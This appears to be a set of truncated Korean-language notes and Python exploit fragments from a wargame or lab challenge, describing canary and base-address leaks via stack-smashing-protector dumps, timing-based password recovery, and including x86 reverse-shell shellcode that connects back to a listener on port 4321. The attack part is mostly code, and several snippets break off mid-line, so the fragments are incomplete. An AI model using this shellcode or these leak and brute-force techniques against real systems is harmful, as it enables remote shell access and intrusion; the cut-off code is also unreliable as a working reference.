int $0x80

binary base address를 브루트포싱으로 구했는데지금 생각해보니 ssp 메세지에 메모리덤프가 오는걸 까먹고있었다이거 이용하면 브루트포싱 필요 X 최초실행시 password = '' 밑에 password='~~~~' 를 주석처리하고 canary = '' binary = 0으로 설정하고 실행한뒤 다음에 실행할때 세개 값 확인해서 넣어두면 빠르게 가능 password 알아올때 마지막 글자만 분리한 이유는 왜그런지는 아직 모르겠는데 마지막글자만 느리게 나오고 다른 글자가 나오는경우가 많음 그래도 빈도는 맞는글자가 더 많이 나와서 10번 돌려보고 제일 많이 나온글자로 결정 -> 내 테스트환경에선 이렇게 했을때 false positive 없었음 canary는 메모리릭 방법이 딱히 없어서 내 문서의 세번째..

from cd80 import * import hmac import hashlib import time s = makeCon("192.168.81.140", 20003) token = eval(s.recv(4096)) print token # LHOST=127.0.0.1 LPORT=4321 shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\ "\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\ "\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\ "\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f..

import struct from socket import * import sys import time p = lambda x : struct.pack("